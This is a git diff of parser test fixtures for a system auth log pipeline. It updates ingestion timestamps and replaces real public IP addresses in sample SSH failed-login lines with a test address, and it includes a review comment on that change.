"timezone": "+0000", "kind": "event" }, @@ -1658,7 +1658,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624998772Z", + "ingested": "2021-12-09T13:45:36.404142500Z", "timezone": "+0000", "kind": "event" }, @@ -1695,7 +1695,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624999189Z", + "ingested": "2021-12-09T13:45:36.404148400Z", "timezone": "+0000", "kind": "event" }, @@ -1740,7 +1740,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-07-30T21:06:01.624999598Z", + "ingested": "2021-12-09T13:45:36.404154500Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", 
@@ -1782,7 +1782,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.624999982Z", + "ingested": "2021-12-09T13:45:36.404159300Z", "timezone": "+0000", "kind": "event" }, @@ -1831,7 +1831,7 @@ "ip": "10.0.2.2" }, "event": { - "ingested": "2021-07-30T21:06:01.625000365Z", + "ingested": "2021-12-09T13:45:36.404164100Z", "timezone": "+0000", "kind": "event", "action": "ssh_login", @@ -1873,7 +1873,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625000856Z", + "ingested": "2021-12-09T13:45:36.404169700Z", "timezone": "+0000", "kind": "event" }, @@ -1917,7 +1917,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625001263Z", + "ingested": "2021-12-09T13:45:36.404173300Z", "timezone": "+0000", "kind": "event" }, @@ -1952,7 +1952,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625001718Z", + "ingested": "2021-12-09T13:45:36.404178Z", "timezone": "+0000", "kind": "event" }, @@ -1986,7 +1986,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625002112Z", + "ingested": "2021-12-09T13:45:36.404182900Z", "category": [ "iam" ], @@ -2021,7 +2021,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625002504Z", + "ingested": "2021-12-09T13:45:36.404186800Z", "category": [ "iam" ], @@ -2056,7 +2056,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625002903Z", + "ingested": "2021-12-09T13:45:36.404191300Z", "category": [ "iam" ], @@ -2102,7 +2102,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625003297Z", + "ingested": "2021-12-09T13:45:36.404195700Z", "category": [ "iam" ], @@ -2143,7 +2143,7 @@ "hostname": "precise32" }, "event": { - "ingested": "2021-07-30T21:06:01.625003688Z", + "ingested": "2021-12-09T13:45:36.404201100Z", "timezone": "+0000", "kind": "event" }, 
@@ -2170,7 +2170,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625004075Z",
+ "ingested": "2021-12-09T13:45:36.404206200Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -2197,7 +2197,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625004477Z",
+ "ingested": "2021-12-09T13:45:36.404211400Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -2224,7 +2224,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625004888Z",
+ "ingested": "2021-12-09T13:45:36.404216200Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -2255,7 +2255,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625005280Z",
+ "ingested": "2021-12-09T13:45:36.404220700Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -2288,7 +2288,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625005677Z",
+ "ingested": "2021-12-09T13:45:36.404225Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -2325,7 +2325,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625006072Z",
+ "ingested": "2021-12-09T13:45:36.404228700Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -2360,7 +2360,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625006467Z",
+ "ingested": "2021-12-09T13:45:36.404233300Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -2396,7 +2396,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625006856Z",
+ "ingested": "2021-12-09T13:45:36.404237900Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -2437,7 +2437,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625007259Z",
+ "ingested": "2021-12-09T13:45:36.404242500Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -2468,7 +2468,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625007655Z",
+ "ingested": "2021-12-09T13:45:36.404246700Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -2505,7 +2505,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625008047Z",
+ "ingested": "2021-12-09T13:45:36.404251900Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -2540,7 +2540,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625008444Z",
+ "ingested": "2021-12-09T13:45:36.404257700Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -2576,7 +2576,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625008855Z",
+ "ingested": "2021-12-09T13:45:36.404262200Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -2617,7 +2617,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625009278Z",
+ "ingested": "2021-12-09T13:45:36.404267Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -2648,7 +2648,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625009672Z",
+ "ingested": "2021-12-09T13:45:36.404272400Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -2685,7 +2685,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625010068Z",
+ "ingested": "2021-12-09T13:45:36.404277300Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -2720,7 +2720,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625010564Z",
+ "ingested": "2021-12-09T13:45:36.404283800Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -2756,7 +2756,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625010962Z",
+ "ingested": "2021-12-09T13:45:36.404289800Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -2789,7 +2789,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625011356Z",
+ "ingested": "2021-12-09T13:45:36.404295600Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -2826,7 +2826,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625011748Z",
+ "ingested": "2021-12-09T13:45:36.404301500Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -2859,7 +2859,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625012140Z",
+ "ingested": "2021-12-09T13:45:36.404307Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -2891,7 +2891,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625012536Z",
+ "ingested": "2021-12-09T13:45:36.404310600Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -2921,7 +2921,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625012918Z",
+ "ingested": "2021-12-09T13:45:36.404315Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -2951,7 +2951,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625013298Z",
+ "ingested": "2021-12-09T13:45:36.404320100Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -2996,7 +2996,7 @@
 "ip": "10.0.2.2"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625013688Z",
+ "ingested": "2021-12-09T13:45:36.404324900Z",
 "timezone": "+0000",
 "kind": "event",
 "action": "ssh_login",
@@ -3038,7 +3038,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625014097Z",
+ "ingested": "2021-12-09T13:45:36.404329900Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -3072,7 +3072,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625014490Z",
+ "ingested": "2021-12-09T13:45:36.404335900Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -3102,7 +3102,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625014901Z",
+ "ingested": "2021-12-09T13:45:36.404362900Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -3135,7 +3135,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625015319Z",
+ "ingested": "2021-12-09T13:45:36.404369500Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -3168,7 +3168,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625015710Z",
+ "ingested": "2021-12-09T13:45:36.404374Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -3205,7 +3205,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625016102Z",
+ "ingested": "2021-12-09T13:45:36.404378800Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -3238,7 +3238,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625016489Z",
+ "ingested": "2021-12-09T13:45:36.404382500Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -3275,7 +3275,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625016898Z",
+ "ingested": "2021-12-09T13:45:36.404386800Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -3320,7 +3320,7 @@
 "ip": "10.0.2.2"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625017293Z",
+ "ingested": "2021-12-09T13:45:36.404391400Z",
 "timezone": "+0000",
 "kind": "event",
 "action": "ssh_login",
@@ -3362,7 +3362,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625017682Z",
+ "ingested": "2021-12-09T13:45:36.404396600Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -3406,7 +3406,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625018075Z",
+ "ingested": "2021-12-09T13:45:36.404401800Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -3441,7 +3441,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625018475Z",
+ "ingested": "2021-12-09T13:45:36.404405700Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -3477,7 +3477,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625018884Z",
+ "ingested": "2021-12-09T13:45:36.404410400Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -3517,7 +3517,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625019286Z",
+ "ingested": "2021-12-09T13:45:36.404416300Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -3552,7 +3552,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625019678Z",
+ "ingested": "2021-12-09T13:45:36.404421600Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -3588,7 +3588,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625020069Z",
+ "ingested": "2021-12-09T13:45:36.404426400Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -3628,7 +3628,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625020540Z",
+ "ingested": "2021-12-09T13:45:36.404432200Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -3663,7 +3663,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625020928Z",
+ "ingested": "2021-12-09T13:45:36.404438Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -3699,7 +3699,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625021319Z",
+ "ingested": "2021-12-09T13:45:36.404443900Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -3739,7 +3739,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625021724Z",
+ "ingested": "2021-12-09T13:45:36.404449700Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -3774,7 +3774,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625022119Z",
+ "ingested": "2021-12-09T13:45:36.404455500Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -3810,7 +3810,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625022512Z",
+ "ingested": "2021-12-09T13:45:36.404459800Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -3850,7 +3850,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625022894Z",
+ "ingested": "2021-12-09T13:45:36.404464700Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -3885,7 +3885,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625023287Z",
+ "ingested": "2021-12-09T13:45:36.404469400Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -3919,7 +3919,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625023749Z",
+ "ingested": "2021-12-09T13:45:36.404473600Z",
 "category": [
 "iam"
 ],
@@ -3954,7 +3954,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625024138Z",
+ "ingested": "2021-12-09T13:45:36.404478200Z",
 "category": [
 "iam"
 ],
@@ -3989,7 +3989,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625024545Z",
+ "ingested": "2021-12-09T13:45:36.404482500Z",
 "category": [
 "iam"
 ],
@@ -4035,7 +4035,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625025053Z",
+ "ingested": "2021-12-09T13:45:36.404486400Z",
 "category": [
 "iam"
 ],
@@ -4076,7 +4076,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625025454Z",
+ "ingested": "2021-12-09T13:45:36.404491100Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -4103,7 +4103,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625091777Z",
+ "ingested": "2021-12-09T13:45:36.404497700Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -4132,7 +4132,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625092682Z",
+ "ingested": "2021-12-09T13:45:36.404501200Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -4172,7 +4172,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625093148Z",
+ "ingested": "2021-12-09T13:45:36.404506100Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -4207,7 +4207,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625093587Z",
+ "ingested": "2021-12-09T13:45:36.404511Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -4243,7 +4243,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625094037Z",
+ "ingested": "2021-12-09T13:45:36.404516100Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -4283,7 +4283,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625094429Z",
+ "ingested": "2021-12-09T13:45:36.404521200Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -4318,7 +4318,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625094830Z",
+ "ingested": "2021-12-09T13:45:36.404525100Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -4354,7 +4354,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625095234Z",
+ "ingested": "2021-12-09T13:45:36.404530200Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -4399,7 +4399,7 @@
 "ip": "10.0.2.2"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625095627Z",
+ "ingested": "2021-12-09T13:45:36.404534500Z",
 "timezone": "+0000",
 "kind": "event",
 "action": "ssh_login",
@@ -4441,7 +4441,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:01.625096015Z",
+ "ingested": "2021-12-09T13:45:36.404539300Z",
 "timezone": "+0000",
 "kind": "event"
 },
diff --git a/packages/system/data_stream/auth/_dev/test/pipeline/test-auth.log b/packages/system/data_stream/auth/_dev/test/pipeline/test-auth.log
index d1bea07e2a2..0690ce504af 100644
--- a/packages/system/data_stream/auth/_dev/test/pipeline/test-auth.log
+++ b/packages/system/data_stream/auth/_dev/test/pipeline/test-auth.log
@@ -1,9 +1,9 @@
 Feb 21 21:54:44 localhost sshd[3402]: Accepted publickey for vagrant from 10.0.2.2 port 63673 ssh2: RSA 39:33:99:e9:a0:dc:f2:33:a3:e5:72:3b:7c:3a:56:84
 Feb 23 00:13:35 localhost sshd[7483]: Accepted password for vagrant from 192.168.33.1 port 58803 ssh2
 Feb 21 21:56:12 localhost sshd[3430]: Invalid user test from 10.0.2.2
-Feb 20 08:35:22 slave22 sshd[5774]: Failed password for root from 116.31.116.24 port 29160 ssh2
+Feb 20 08:35:22 slave22 sshd[5774]: Failed password for root from 89.160.20.156 port 29160 ssh2
 Feb 21 23:35:33 localhost sudo: vagrant : TTY=pts/0 ; PWD=/home/vagrant ; USER=root ; COMMAND=/bin/ls
-Feb 19 15:30:04 slave22 sshd[18406]: Did not receive identification string from 123.57.245.163
+Feb 19 15:30:04 slave22 sshd[18406]: Did not receive identification string from 89.160.20.156
 Feb 23 00:08:48 localhost sudo: vagrant : TTY=pts/1 ; PWD=/home/vagrant ; USER=root ; COMMAND=/bin/cat /var/log/secure
 Feb 24 00:13:02 precise32 sudo: tsg : user NOT in sudoers ; TTY=pts/1 ; PWD=/home/vagrant ; USER=root ; COMMAND=/bin/ls
 Feb 22 11:47:05 localhost groupadd[6991]: new group: name=apache, GID=48
diff --git a/packages/system/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json b/packages/system/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json
index 71ac4cdb912..97c714057b9 100644
--- a/packages/system/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json
+++ b/packages/system/data_stream/auth/_dev/test/pipeline/test-auth.log-expected.json
@@ -37,7 +37,7 @@
 "ip": "10.0.2.2"
 },
 "event": {
- "ingested": "2021-07-30T21:06:02.841786810Z",
+ "ingested": "2021-12-09T13:45:42.694570800Z",
 "timezone": "+0000",
 "kind": "event",
 "action": "ssh_login",
@@ -91,7 +91,7 @@
 "ip": "192.168.33.1"
 },
 "event": {
- "ingested": "2021-07-30T21:06:02.841789488Z",
+ "ingested": "2021-12-09T13:45:42.694579100Z",
 "timezone": "+0000",
 "kind": "event",
 "action": "ssh_login",
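Review bot: Both external addresses in this fixture, `116.31.116.24` on the `Failed password` line and `123.57.245.163` on the `Did not receive identification string` line, are replaced with the same `89.160.20.156`, so the log no longer carries two distinct public `source.ip` / `related.ip` / `system.auth.ssh.dropped_ip` values across the two sshd message formats and the expected output for those two events becomes harder to tell apart. If the supported GeoIP test subset offers more than one address, keeping a second one on the `Did not receive identification string` line would preserve that distinction; the three `slave22` lines in `test-secure-rhel7.log` are collapsed the same way, although there they belong to one sshd session (pids 2738 and 2742, same rhost), so a single address is arguably correct. Replacing real public addresses with a documented test address is otherwise the right move: the expected enrichment stops depending on the live GeoLite2 database, and the sample failed-login lines no longer name a real third party's host.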
@@ -143,7 +143,7 @@
 "ip": "10.0.2.2"
 },
 "event": {
- "ingested": "2021-07-30T21:06:02.841789953Z",
+ "ingested": "2021-12-09T13:45:42.694584600Z",
 "timezone": "+0000",
 "kind": "event",
 "action": "ssh_login",
@@ -182,7 +182,7 @@
 "slave22"
 ],
 "ip": [
- "116.31.116.24"
+ "89.160.20.156"
 ]
 },
 "ecs": {
@@ -193,27 +193,28 @@
 },
 "source": {
 "geo": {
- "continent_name": "Asia",
- "region_iso_code": "CN-GD",
- "country_name": "China",
- "region_name": "Guangdong",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-AB",
+ "city_name": "Tumba",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Stockholm",
 "location": {
- "lon": 113.25,
- "lat": 23.1167
- },
- "country_iso_code": "CN"
+ "lon": 17.8167,
+ "lat": 59.2
+ }
 },
 "as": {
- "number": 134764,
+ "number": 29518,
 "organization": {
- "name": "CHINANET Guangdong province network"
+ "name": "Bredband2 AB"
 }
 },
 "port": 29160,
- "ip": "116.31.116.24"
+ "ip": "89.160.20.156"
 },
 "event": {
- "ingested": "2021-07-30T21:06:02.841790358Z",
+ "ingested": "2021-12-09T13:45:42.694589900Z",
 "timezone": "+0000",
 "kind": "event",
 "action": "ssh_login",
@@ -261,7 +262,7 @@
 "hostname": "localhost"
 },
 "event": {
- "ingested": "2021-07-30T21:06:02.841790793Z",
+ "ingested": "2021-12-09T13:45:42.694595300Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -280,7 +281,7 @@
 "system": {
 "auth": {
 "ssh": {
- "dropped_ip": "123.57.245.163"
+ "dropped_ip": "89.160.20.156"
 }
 }
 },
@@ -290,7 +291,7 @@
 "slave22"
 ],
 "ip": [
- "123.57.245.163"
+ "89.160.20.156"
 ]
 },
 "ecs": {
@@ -301,27 +302,27 @@
 },
 "source": {
 "geo": {
- "continent_name": "Asia",
- "region_iso_code": "CN-ZJ",
- "city_name": "Hangzhou",
- "country_iso_code": "CN",
- "country_name": "China",
- "region_name": "Zhejiang",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-AB",
+ "city_name": "Tumba",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Stockholm",
 "location": {
- "lon": 120.1619,
- "lat": 30.294
+ "lon": 17.8167,
+ "lat": 59.2
 }
 },
 "as": {
- "number": 37963,
+ "number": 29518,
 "organization": {
- "name": "Hangzhou Alibaba Advertising Co.,Ltd."
+ "name": "Bredband2 AB"
 }
 },
- "ip": "123.57.245.163"
+ "ip": "89.160.20.156"
 },
 "event": {
- "ingested": "2021-07-30T21:06:02.841791189Z",
+ "ingested": "2021-12-09T13:45:42.694600700Z",
 "timezone": "+0000",
 "kind": "event"
 }
@@ -357,7 +358,7 @@
 "hostname": "localhost"
 },
 "event": {
- "ingested": "2021-07-30T21:06:02.841791580Z",
+ "ingested": "2021-12-09T13:45:42.694605900Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -400,7 +401,7 @@
 "hostname": "precise32"
 },
 "event": {
- "ingested": "2021-07-30T21:06:02.841791990Z",
+ "ingested": "2021-12-09T13:45:42.694611200Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -432,7 +433,7 @@
 "hostname": "localhost"
 },
 "event": {
- "ingested": "2021-07-30T21:06:02.841792403Z",
+ "ingested": "2021-12-09T13:45:42.694616600Z",
 "category": [
 "iam"
 ],
@@ -478,7 +479,7 @@
 "hostname": "localhost"
 },
 "event": {
- "ingested": "2021-07-30T21:06:02.841792795Z",
+ "ingested": "2021-12-09T13:45:42.694621900Z",
 "category": [
 "iam"
 ],
diff --git a/packages/system/data_stream/auth/_dev/test/pipeline/test-secure-rhel7.log b/packages/system/data_stream/auth/_dev/test/pipeline/test-secure-rhel7.log
index 4a33e9e09a1..f22060fef5b 100644
--- a/packages/system/data_stream/auth/_dev/test/pipeline/test-secure-rhel7.log
+++ b/packages/system/data_stream/auth/_dev/test/pipeline/test-secure-rhel7.log
@@ -1,7 +1,7 @@
-Feb 22 16:45:20 slave22 sshd[2738]: Failed password for root from 202.109.143.106 port 1786 ssh2
+Feb 22 16:45:20 slave22 sshd[2738]: Failed password for root from 89.160.20.156 port 1786 ssh2
 Feb 22 16:45:20 slave22 sshd[2738]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
 Feb 22 16:45:26 slave22 sshd[2738]: fatal: Read from socket failed: Connection reset by peer [preauth]
-Feb 22 16:45:26 slave22 sshd[2738]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 16:45:26 slave22 sshd[2738]: PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.160.20.156 user=root
 Feb 22 16:45:26 slave22 sshd[2738]: PAM service(sshd) ignoring max retries; 5 > 3
-Feb 22 16:45:32 slave22 sshd[2742]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root
+Feb 22 16:45:32 slave22 sshd[2742]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.160.20.156 user=root
 Feb 22 17:04:51 slave22 sudo: tsg : TTY=pts/0 ; PWD=/home/tsg ; USER=root ; COMMAND=/bin/cp /var/log/secure .
diff --git a/packages/system/data_stream/auth/_dev/test/pipeline/test-secure-rhel7.log-expected.json b/packages/system/data_stream/auth/_dev/test/pipeline/test-secure-rhel7.log-expected.json
index 09825acd254..2cd21b406b8 100644
--- a/packages/system/data_stream/auth/_dev/test/pipeline/test-secure-rhel7.log-expected.json
+++ b/packages/system/data_stream/auth/_dev/test/pipeline/test-secure-rhel7.log-expected.json
@@ -22,7 +22,7 @@
 "slave22"
 ],
 "ip": [
- "202.109.143.106"
+ "89.160.20.156"
 ]
 },
 "ecs": {
@@ -33,27 +33,28 @@
 },
 "source": {
 "geo": {
- "continent_name": "Asia",
- "region_iso_code": "CN-JX",
- "country_name": "China",
- "region_name": "Jiangxi",
+ "continent_name": "Europe",
+ "region_iso_code": "SE-AB",
+ "city_name": "Tumba",
+ "country_iso_code": "SE",
+ "country_name": "Sweden",
+ "region_name": "Stockholm",
 "location": {
- "lon": 115.9333,
- "lat": 28.55
- },
- "country_iso_code": "CN"
+ "lon": 17.8167,
+ "lat": 59.2
+ }
 },
 "as": {
- "number": 4134,
+ "number": 29518,
 "organization": {
- "name": "No.31,Jin-rong Street"
+ "name": "Bredband2 AB"
 }
 },
 "port": 1786,
- "ip": "202.109.143.106"
+ "ip": "89.160.20.156"
 },
 "event": {
- "ingested": "2021-07-30T21:06:02.976688996Z",
+ "ingested": "2021-12-09T13:45:43.392072100Z",
 "timezone": "+0000",
 "kind": "event",
 "action": "ssh_login",
@@ -94,7 +95,7 @@
 "hostname": "slave22"
 },
 "event": {
- "ingested": "2021-07-30T21:06:02.976691519Z",
+ "ingested": "2021-12-09T13:45:43.392079Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -124,7 +125,7 @@
 "hostname": "slave22"
 },
 "event": {
- "ingested": "2021-07-30T21:06:02.976692023Z",
+ "ingested": "2021-12-09T13:45:43.392082800Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -151,11 +152,11 @@
 "hostname": "slave22"
 },
 "event": {
- "ingested": "2021-07-30T21:06:02.976692470Z",
+ "ingested": "2021-12-09T13:45:43.392087500Z",
 "timezone": "+0000",
 "kind": "event"
 },
- "message": "PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root"
+ "message": "PAM 4 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.160.20.156 user=root"
 },
 {
 "process": {
@@ -178,7 +179,7 @@
 "hostname": "slave22"
 },
 "event": {
- "ingested": "2021-07-30T21:06:02.976692871Z",
+ "ingested": "2021-12-09T13:45:43.392091200Z",
 "timezone": "+0000",
 "kind": "event"
 },
@@ -205,11 +206,11 @@
 "hostname": "slave22"
 },
 "event": {
- "ingested": "2021-07-30T21:06:02.976693277Z",
+ "ingested": "2021-12-09T13:45:43.392095700Z",
 "timezone": "+0000",
 "kind": "event"
 },
- "message": "pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.109.143.106 user=root"
+ "message": "pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.160.20.156 user=root"
 },
 {
 "process": {
@@ -242,7 +243,7 @@
 "hostname": "slave22"
 },
 "event": {
- "ingested": "2021-07-30T21:06:02.976693687Z",
+ "ingested": "2021-12-09T13:45:43.392101200Z",
 "timezone": "+0000",
 "kind": "event"
 },
